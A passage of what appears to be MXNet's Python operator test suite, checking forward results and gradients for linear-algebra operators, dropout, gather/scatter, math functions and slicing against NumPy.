_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
